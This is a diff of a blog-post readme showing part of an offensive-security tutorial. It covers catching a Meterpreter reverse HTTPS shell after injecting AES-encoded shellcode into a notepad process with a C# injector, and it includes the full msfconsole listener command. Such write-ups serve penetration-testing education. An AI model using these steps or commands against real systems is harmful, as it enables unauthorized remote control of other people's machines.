0x90JMP/0x90JMP.github.io/blog/pythonAesXor/readme.md

 ![encoded](aes-scan.png)

-## Getting A Reverse Shell On The Target
+## Getting A Shell On The Target Machine

-To test that the InjectAes.exe functions correctly, we first set up a msfconsole listener, with the following command.
+To test that the InjectAes.exe functions correctly, we first set up a msfconsole listener on Kali linux, with the following command.
+The listener will wait for the incoming connection, from shell code that was executed on the target machine (The C# Process Injecton).

 ```
 sudo msfconsole -q -x "use exploit/multi/handler/; set PAYLOAD windows/x64/meterpreter/reverse_https; set LHOST eth0; set LPORT 443; run
 ```

 Once the listener is set up, we must start a notepad process on the target system.
-Just before we execute the InjectAes.exe, we can confirm notepads PID in powershell.
+Just before we execute the InjectAes.exe on the target, we can confirm notepads PID in powershell, we will use this to confirm our shellcode was injected.
 With the PID in hand, we then execute the InjectAes.exe file on the target system.

 ![execute](execute.png)

-We catch the connection in msfconsole and confirm the PID.
+We catch the connection in kali linux, using msfconsole.
+We can then confirm the PID is the same as on the target.
 We now have a terminal connection to the target system.

 ![catch](catch-shell.png)